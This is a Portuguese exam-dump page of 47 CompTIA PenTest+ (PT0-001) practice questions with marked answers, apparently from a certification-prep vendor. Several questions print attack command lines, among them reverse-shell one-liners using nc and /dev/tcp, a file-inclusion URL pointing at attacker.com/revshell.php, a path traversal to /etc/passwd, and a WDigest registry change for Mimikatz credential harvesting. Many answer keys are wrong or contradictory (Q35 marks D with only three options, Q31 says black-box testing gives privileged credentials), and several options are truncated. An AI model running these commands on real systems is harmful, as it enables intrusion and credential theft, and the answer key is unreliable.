NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

CompTIA PT0-001 Exame Perguntas 2024 Atualizado: Prepare-se para os exames, Certificação CompTIA PenTest+ | SPOTO

Prepare-se para sua certificação CompTIA PenTest+ (PT0-001) com nossas 2024 perguntas atualizadas do exame CompTIA PT0-001. A melhor maneira de se preparar para seus exames é praticando com as últimas perguntas do exame. Nossos testes práticos cobrem uma variedade de tópicos e cenários, incluindo testes práticos em novos ambientes, como a nuvem e plataformas móveis, além de desktops e servidores tradicionais. Ao utilizar as nossas perguntas de exame, exemplos de perguntas e lixeiras de exame, obterá o conhecimento e a confiança necessários para ter sucesso. Os nossos exames simulados e o simulador de exames proporcionam uma experiência de exame realista para melhorar ainda mais a sua preparação. Aceda aos nossos materiais de exame e respostas de exame para garantir que está totalmente preparado para o exame PT0-001 e obtenha a sua certificação CompTIA PenTest+ com facilidade.
Faça outros exames online

Pergunta #1
Um técnico de testes de penetração entrega um relatório de análise de vulnerabilidades de uma aplicação Web a um cliente. O verificador de penetração classifica uma vulnerabilidade como de gravidade média. A mesma vulnerabilidade foi relatada como uma descoberta de gravidade crítica no relatório anterior. Qual das seguintes opções é a razão MAIS provável para a redução da gravidade?
A. O cliente aplicou um hot fix sem atualizar a versão
B. O cenário de ameaças mudou significativamente
C. O cliente actualizou a sua base de código com novas funcionalidades
D. Atualmente, não existem explorações conhecidas para esta vulnerabilidade
Ver resposta
Resposta correta: A
Pergunta #2
Um testador de penetração está a efetuar a recolha inicial de informações em alguns anfitriões remotos antes de realizar uma análise de vulnerabilidades. O testador executa o seguinte comando: nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Qual das seguintes opções descreve MELHOR a razão pela qual são especificados vários endereços IP?
A. A rede tem uma sub-rede a/25 ou superior, e o testador precisava de aceder a anfitriões em duas sub-redes diferentes
B. O testador está a tentar efetuar uma verificação mais furtiva ao incluir vários endereços falsos
C. A máquina de digitalização tem várias interfaces para equilibrar o pedido de digitalização ao ritmo especificado
D. Uma verificação de descoberta é executada no primeiro conjunto de endereços, enquanto uma verificação mais profunda e agressiva é executada contra o último host
Ver resposta
Resposta correta: A
Pergunta #3
Um técnico de testes de penetração identifica os seguintes resultados durante uma análise de vulnerabilidades externas: Qual das seguintes estratégias de ataque deve ser priorizada a partir dos resultados da verificação acima?
A. O software obsoleto pode conter componentes susceptíveis de serem explorados
B. Podem ser utilizadas práticas de gestão de palavras-passe fracas
C. Os protocolos criptograficamente fracos podem ser interceptados
D. As configurações do servidor Web podem revelar informações sensíveis
Ver resposta
Resposta correta: D
Pergunta #4
Uma empresa contrata um testador de penetração para determinar se há alguma vulnerabilidade na nova instalação do concentrador de VPN com um IP externo de 100.170.60.5. Qual dos seguintes comandos testará se a VPN está disponível?
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
Ver resposta
Resposta correta: B
Pergunta #5
Um testador de penetração relata que uma aplicação só está a utilizar a autenticação básica numa aplicação virada para a Internet. Qual das seguintes opções seria a MELHOR estratégia de correção?
A. Ativar a segurança de transporte estrito HTTP
B. Ativar um sinalizador de cookie seguro
C. Encriptar o canal de comunicação
D. Sanitize a entrada inválida do utilizador
Ver resposta
Resposta correta: A
Pergunta #6
Uma mensagem de correio eletrónico enviada pelo Diretor Executivo (CEO) para o Diretor Financeiro (CFO) indica que é necessária uma transferência eletrónica para pagar a um novo fornecedor. Nenhum dos dois tem conhecimento do fornecedor e o CEO nega ter enviado o e-mail. Qual dos seguintes tipos de motivação foi utilizado neste ataque?
A. Princípio do medo
B. Princípio da autoridade
C. Princípio da escassez
D. Princípio da semelhança
E. Princípio da prova social
Ver resposta
Resposta correta: B
Pergunta #7
Um avaliador de segurança concluiu um teste de penetração abrangente de uma empresa e das suas redes e sistemas. Durante a avaliação, o avaliador identificou uma vulnerabilidade na biblioteca de criptografia utilizada para TLS na aplicação Web de processamento de salários da intranet da empresa. No entanto, a vulnerabilidade ainda não foi corrigida pelo fornecedor, embora uma correção seja esperada dentro de alguns dias. Qual das seguintes estratégias MELHOR mitigaria o risco de impacto?
A. Modifique a configuração de criptografia do servidor Web para utilizar um conjunto de cifras mais forte para encriptação, hashing e assinatura digital
B. Implementar uma nova formação para estar ciente dos riscos no acesso à aplicação
C. Implementar uma ACL para restringir o acesso à aplicação exclusivamente ao departamento financeiro
D. Exigir que os utilizadores dos salários alterem as palavras-passe utilizadas para autenticar a aplicação
Ver resposta
Resposta correta: C
Pergunta #8
Um técnico de testes de penetração foi designado para efetuar uma avaliação da penetração externa de uma empresa. Qual das seguintes etapas seria a MELHOR ajuda para o processo de recolha de informações passivas? (Escolha duas.)
A. Esperar no exterior do edifício da empresa e tentar seguir atrás de um empregado
B. Efetuar uma análise de vulnerabilidades ao bloco de rede externo da empresa, identificar vulnerabilidades exploráveis e tentar obter acesso
C. Utilizar os sítios Web de registo de domínios e de IP para identificar os blocos de rede externos da empresa e as aplicações voltadas para o exterior
D. Pesquisar nas redes sociais os funcionários das tecnologias de informação que publicam informações sobre as tecnologias com que trabalham
E. Identificar a aplicação de webmail externa da empresa, enumerar as contas de utilizador e tentar adivinhar a palavra-passe para obter acesso
Ver resposta
Resposta correta: DE
Pergunta #9
Dado o seguinte guião: Qual das seguintes opções descreve MELHOR o objetivo deste script?
A. Recolha de registos
B. Recolha de eventos
C. Monitorização das teclas premidas
D. Recolha de mensagens de depuração
Ver resposta
Resposta correta: C
Pergunta #10
Ao tentar manter a persistência num sistema Windows com privilégios limitados, qual das seguintes chaves de registo deve ser utilizada pelo verificador?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_UTILIZADOR_ACTUAL
D. HKEY_CURRENT_CONFIG
Ver resposta
Resposta correta: C
Pergunta #11
Um programador de software pretende testar o código de uma aplicação para detetar vulnerabilidades. Qual dos seguintes processos deve o programador de software efetuar?
A. Análise de vulnerabilidades
B. Análise dinâmica
C. Verificação estática
D. Verificação da conformidade
Ver resposta
Resposta correta: A
Pergunta #12
Durante a avaliação de uma aplicação Web, um técnico de testes de penetração descobre que podem ser executados comandos arbitrários no servidor. Querendo levar esse ataque um passo adiante, o testador de penetração começa a explorar maneiras de obter um shell reverso de volta para a máquina atacante em 192.168.1.5. Quais das seguintes são formas possíveis de o fazer? (Seleccione DUAS).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
Ver resposta
Resposta correta: BC
Pergunta #13
Dado o seguinte: http://example.com/download.php?id-.../.../.../etc/passwd Qual das seguintes opções descreve MELHOR o ataque acima?
A. Ataque de carregamento malicioso de ficheiros
B. Ataque de redireccionamento
C. Ataque de travessia de directórios
D. Ataque inseguro de referência ao objeto direto
Ver resposta
Resposta correta: C
Pergunta #14
Uma empresa contratou uma empresa especializada em testes de penetração para avaliar a segurança de uma aplicação comercial central. A empresa forneceu à firma uma cópia do bytecode Java. Qual das seguintes etapas a empresa deve seguir antes de executar um analisador de código estático?
A. Execute a aplicação através de um analisador de código dinâmico
B. Utilizar um utilitário de fuzzing
C. Descompilar a aplicação
D. Verificar as atribuições de memória
Ver resposta
Resposta correta: D
Pergunta #15
Enquanto monitoriza os registos WAF, um analista de segurança descobre um ataque bem sucedido contra o seguinte URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Qual dos seguintes passos de correção deve ser tomado para evitar este tipo de ataque?
A. Implementar uma lista negra
B. Bloquear redireccionamentos de URL
C. Dupla codificação URL dos parâmetros
D. Parar as chamadas externas da aplicação
Ver resposta
Resposta correta: B
Pergunta #16
Uma empresa solicitou a um técnico de testes de penetração que analisasse a segurança de uma aplicação Android desenvolvida internamente. O testador de penetração recebeu um arquivo APK para apoiar a avaliação. O testador de penetração deseja executar o SAST no arquivo APK. Qual das seguintes etapas preparatórias deve ser executada PRIMEIRO pelo analista de penetração? (Seleccione DOIS).
A. Converter para JAR
B. Descompilar
C. Compilar a aplicação de forma cruzada
D. Converter ficheiros JAR em DEX
E. Voltar a assinar o APK
F. Fixar à BAD
Ver resposta
Resposta correta: AB
Pergunta #17
Um teste de penetração recentemente concluído revelou que uma aplicação Web antiga é vulnerável à injeção de SQL. A investigação indica que a correção completa da vulnerabilidade exigiria uma alteração da arquitetura e as partes interessadas não estão em posição de arriscar a disponibilidade da aplicação. Nestas circunstâncias, quais dos seguintes controlos são soluções de baixo esforço e de curto prazo para minimizar o risco de injeção de SQL? (Escolha dois.)
A. Identificar e eliminar as instruções SQL em linha do código
B. Identificar e eliminar a SQL dinâmica dos procedimentos armazenados
C. Identificar e higienizar todas as entradas do utilizador
D. Utilizar uma abordagem de lista branca para instruções SQL
E. Utilizar uma abordagem de lista negra para instruções SQL
F. Identificar a origem da entrada maliciosa e bloquear o endereço IP
Ver resposta
Resposta correta: CD
Pergunta #18
Durante os testes, é descoberta uma vulnerabilidade crítica no servidor principal de um cliente. Qual das seguintes acções deve ser a PRÓXIMA?
A. Desativar a porta de rede do serviço afetado
B. Completar todas as conclusões e apresentá-las ao cliente
C. Alertar prontamente o cliente com pormenores sobre a descoberta
D. Colocar o alvo offline para que não possa ser explorado por um atacante
Ver resposta
Resposta correta: A
Pergunta #19
Qual dos seguintes comandos permitiria a um testador de penetração aceder a uma rede privada a partir da Internet no Metasploit?
A. definir rhost 192
B. executar autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. utilizar auxiliar/servidor/socks4a
Ver resposta
Resposta correta: A
Pergunta #20
Uma empresa planeou e assegurou o orçamento para contratar um consultor para realizar um teste de penetração de uma aplicação Web. Após a descoberta de vulnerabilidades, a empresa pediu ao consultor para realizar as seguintes tarefas: Revisão do código Actualizações das definições da firewall Qual das seguintes situações ocorreu nesta situação?
A. Desvio do âmbito
B. Revisão post-mortem
C. Aceitação dos riscos
D. Prevenção de ameaças
Ver resposta
Resposta correta: A
Pergunta #21
Um cliente está a pedir a um técnico de testes de penetração que avalie a disponibilidade de uma nova aplicação Web. Qual dos seguintes tipos de ataques o testador deve usar?
A. Inundação TCP SYN
B. Injeção de SQL
C. XSS
D. Varrimento XMAS
Ver resposta
Resposta correta: B
Pergunta #22
O seguinte comando é executado num sistema de ficheiros Linux: chmod 4111 /usr/bin/sudo Qual dos seguintes problemas pode ser explorado agora?
A. Vulnerabilidades do kernel
B. Bits pegajosos
C. Percurso de serviço não cotado
D. Sudo mal configurado
Ver resposta
Resposta correta: B
Pergunta #23
Um testador de penetração é capaz de se mover lateralmente por um domínio com o mínimo de bloqueios após comprometer uma única estação de trabalho. Qual das seguintes estratégias de atenuação seria a MELHOR para recomendar no relatório? (Seleccione TRÊS).
A. Randomize as credenciais de administrador local para cada máquina
B. Desativar os inícios de sessão remotos para os administradores locais
C. Exigir a autenticação multifactor para todos os inícios de sessão
D. Aumentar os requisitos mínimos de complexidade da palavra-passe
E. Aplicar um controlo de acesso à rede adicional
F. Ativar a encriptação total do disco em todas as estações de trabalho
G. Segmentar cada anfitrião na sua própria VLAN
Ver resposta
Resposta correta: CDE
Pergunta #24
Qual das seguintes opções explica MELHOR por que razão é importante manter a confidencialidade de quaisquer descobertas identificadas ao efetuar um teste de penetração?
A. Os resultados dos testes de penetração contêm frequentemente propriedade intelectual da empresa
B. Os resultados dos testes de penetração podem levar à insatisfação dos consumidores se forem tornados públicos
C. Os resultados dos testes de penetração são documentos legais que contêm informações privilegiadas
D. Os resultados dos testes de penetração podem ajudar um atacante a comprometer um sistema
Ver resposta
Resposta correta: D
Pergunta #25
Um técnico de testes de penetração tem de efetuar OSINT no pessoal de uma empresa-alvo depois de concluir o aspeto da infraestrutura. Qual dos seguintes seria o MELHOR passo para a penetração?
A. Obter informações sobre o pessoal telefonando para a empresa e utilizando técnicas de engenharia social
B. Visitar o cliente e fazer-se passar por ele para obter informações do pessoal
C. Enviar mensagens de correio eletrónico falsas ao pessoal para ver se este responde com informações sensíveis
D. Procurar na Internet informações sobre o pessoal, nomeadamente em sítios de redes sociais
Ver resposta
Resposta correta: D
Pergunta #26
Clique no botão de exibição. Dada a vulnerabilidade Nikto, a saída da verificação mostrada na exibição, qual das seguintes técnicas de exploração pode ser usada para explorar o sistema de destino? (Escolha duas.)
A. Execução arbitrária de código
B. Sequestro de sessão
C. Injeção de SQL
D. Força bruta das credenciais de início de sessão
E. Falsificação de pedidos entre sítios
Ver resposta
Resposta correta: BD
Pergunta #27
Um testador pretende executar o seguinte comando em um sistema de destino: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Qual dos seguintes comandos adicionais precisaria ser executado no sistema Linux do testador para que o comando anterior fosse bem-sucedido?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
Ver resposta
Resposta correta: D
Pergunta #28
Qual dos seguintes comandos inicia a base de dados do Metasploit?
A. msfconsole
B. espaço de trabalho
C. msfvenom
D. db_init
E. db_connect
Ver resposta
Resposta correta: A
Pergunta #29
Um consultor de segurança está a tentar atacar um dispositivo com uma conta de utilizador previamente identificada. Qual dos seguintes tipos de ataques está a ser executado?
A. Ataque de despejo de credenciais
B. Ataque de injeção de DLL
C. Ataque shell invertido
D. Passar o ataque hash
Ver resposta
Resposta correta: D
Pergunta #30
Uma equipa de desenvolvimento de software migrou recentemente para um novo software de aplicação no ambiente local. Os resultados do teste de penetração mostram que existem várias vulnerabilidades. Se um técnico de testes de penetração não tiver acesso a um ambiente real ou de teste, poderá ser melhor criar o mesmo ambiente na máquina virtual. Qual das seguintes opções é a MAIS importante para a confirmação?
A. Configuração insegura de serviços e protocolos
B. Executar o serviço SMB e SMTP
C. Fraca complexidade da palavra-passe e da conta de utilizador
D. Configuração incorrecta
Ver resposta
Resposta correta: A
Pergunta #31
A estratégia de teste de penetração de caixa preta fornece ao testador:
A. uma lista de objectivos
B. um diagrama de rede
C. código-fonte
D. credenciais privilegiadas
Ver resposta
Resposta correta: D
Pergunta #32
Um técnico de testes de penetração está a analisar uma rede em busca de SSH e tem uma lista de alvos fornecidos. Qual dos seguintes comandos do Nmap o testador deve usar?
A. nmap -p 22 -iL alvos
B. nmap -p 22 -sL alvos
C. nmap -p 22 -oG alvos
D. nmap -p 22 -oA alvos
Ver resposta
Resposta correta: A
Pergunta #33
Se um consultor de segurança se deparar com um hash de palavra-passe semelhante ao seguinte: b117525b345470c29ca3d8ac0b556ba8 Qual dos seguintes formatos é o tipo de hash correto?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Ver resposta
Resposta correta: D
Pergunta #34
Um engenheiro, que está a realizar um teste de penetração para uma aplicação Web, descobre que o processo de início de sessão do utilizador envia dados de campo utilizando o método HTTP GET. Para mitigar o risco de exposição de informações sensíveis, o formulário deve ser enviado usando o método HTTP GET:
A. Método HTTP POST
B. Método HTTP OPTIONS
C. Método HTTP PUT
D. Método HTTP TRACE
Ver resposta
Resposta correta: A
Pergunta #35
Depois de efetuar uma avaliação de segurança para uma empresa, verificou-se que o cliente foi facturado pelo tempo em que o ambiente de teste do cliente esteve indisponível. O cliente alega ter sido facturado injustamente. Qual dos seguintes documentos seria MAIS suscetível de fornecer orientação numa situação deste tipo?
A. SOW
B. NDA
C. EULAD
Ver resposta
Resposta correta: D
Pergunta #36
Quais dos seguintes aspectos são MAIS importantes no planeamento de um noivado? (Seleccione DOIS).
A. Metas/objectivos
B. Diagramas de arquitetura
C. Tolerância ao impacto
D. Tempo de armazenamento de um relatório
E. Políticas da empresa
Ver resposta
Resposta correta: AC
Pergunta #37
Qual dos seguintes registos do CPU é necessário substituir para explorar um simples buffer overflow?
A. Registo do ponteiro de pilha
B. Registo do ponteiro de índice
C. Ponteiro da base da pilha
D. Registo do índice de destino
Ver resposta
Resposta correta: A
Pergunta #38
Um testador de penetração executa o seguinte a partir de um computador comprometido 'python -c ' import pty;pty.spawn ("/bin/bash") '. Qual das seguintes acções está o examinador a executar?
A. Remover o histórico do Bash
B. Atualizar a shell
C. Criar uma caixa de areia
D. Captura de credenciais
Ver resposta
Resposta correta: B
Pergunta #39
Um testador de penetração tem um shell completo para um controlador de domínio e quer descobrir qualquer conta de utilizador que não tenha sido autenticada no domínio em 21 dias. Qual dos seguintes comandos seria o MELHOR para atingir este objetivo?
A. dsrm -users "DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
Ver resposta
Resposta correta: D
Pergunta #40
Um testador de penetração está a tentar capturar um aperto de mão entre um cliente e um ponto de acesso, monitorizando uma rede sem fios protegida por WPA2-PSK. O testador está a monitorizar o canal correto para a rede identificada, mas não conseguiu captar um aperto de mão. Dado o cenário, qual dos seguintes ataques MELHOR ajudaria o testador a obter esse handshake?
A. Ataque de karma
B. Ataque de desautenticação
C. Ataque de fragmentação
D. Inundação de transmissão SSDI
Ver resposta
Resposta correta: B
Pergunta #41
Um técnico de testes de penetração efectuou o seguinte scan do Nmap num computador: nmap -aV 192.168.1.5 A organização afirmou ter desativado o Telnet do seu ambiente. No entanto, os resultados do scan do Nmap mostram a porta 22 como fechada e a porta 23 como aberta para SSH. Qual das seguintes é a MELHOR explicação para o que aconteceu?
A. A organização não conseguiu desativar o Telnet
B. Os resultados do Nmap contêm um falso positivo para a porta 23
C. A porta 22 foi filtrada
D. O serviço está a ser executado numa porta não padrão
Ver resposta
Resposta correta: A
Pergunta #42
Qual das seguintes opções é um exemplo de um ataque de spear phishing?
A. Visar um executivo com um ataque por SMS
B. Visar uma equipa específica com um ataque por correio eletrónico
C. Visar utilizadores aleatórios com uma entrega de chaves USB
D. Visar uma organização com um ataque do tipo "watering hole
Ver resposta
Resposta correta: A
Pergunta #43
Um técnico de testes de penetração pretende verificar manualmente se existe uma vulnerabilidade "fantasma" num sistema. Qual dos seguintes métodos é a forma correcta de validar a vulnerabilidade?
A. Descarregar o ficheiro GHOST para um sistema Linux e compilar gcc -o GHOST test i:
B. Descarregar o ficheiro GHOST para um sistema Windows e compilar gcc -o GHOST GHOST
C. Descarregar o ficheiro GHOST para um sistema Linux e compilar gcc -o GHOST
D. Descarregar o ficheiro GHOST para um sistema Windows e compilar gcc -o GHOST test i:
Ver resposta
Resposta correta: C
Pergunta #44
Um técnico de testes de penetração está a efetuar uma avaliação de caixa negra numa aplicação bancária baseada na Web. O testador recebeu apenas um URL para a página de login. Dado o código e o resultado abaixo: Qual das seguintes opções o testador pretende fazer?
A. Aumentar horizontalmente os privilégios
B. Raspar a página em busca de campos ocultos
C. Analisar o código de resposta HTTP
D. Procurar cabeçalhos HTTP
Ver resposta
Resposta correta: D
Pergunta #45
Qual das seguintes opções seria a MELHOR para efetuar um reconhecimento passivo no domínio externo de um alvo?
A. Pêssego
B. CeWL
C. OpenVAS
D. Shodan
Ver resposta
Resposta correta: D
Pergunta #46
Durante um teste de penetração, um testador executa uma campanha de phishing e recebe um shell de um PC interno com o sistema operativo Windows 10. O testador deseja executar a coleta de credenciais com o Mimikatz. Qual das seguintes alterações de registo permitiria o armazenamento em cache de credenciais na memória?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
Ver resposta
Resposta correta: A
Pergunta #47
No início de um teste de penetração, o testador encontra um ficheiro que inclui dados de empregados, tais como endereços de correio eletrónico, números de telefone do trabalho, nomes de computadores e localizações de escritórios. O ficheiro está alojado num servidor Web público. Qual das seguintes opções descreve MELHOR a técnica que foi usada para obter essas informações?
A. Enumeração dos serviços
B. Recolha de OSINT
C. Rastreio de portas
D. Engenharia social
Ver resposta
Resposta correta: B

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: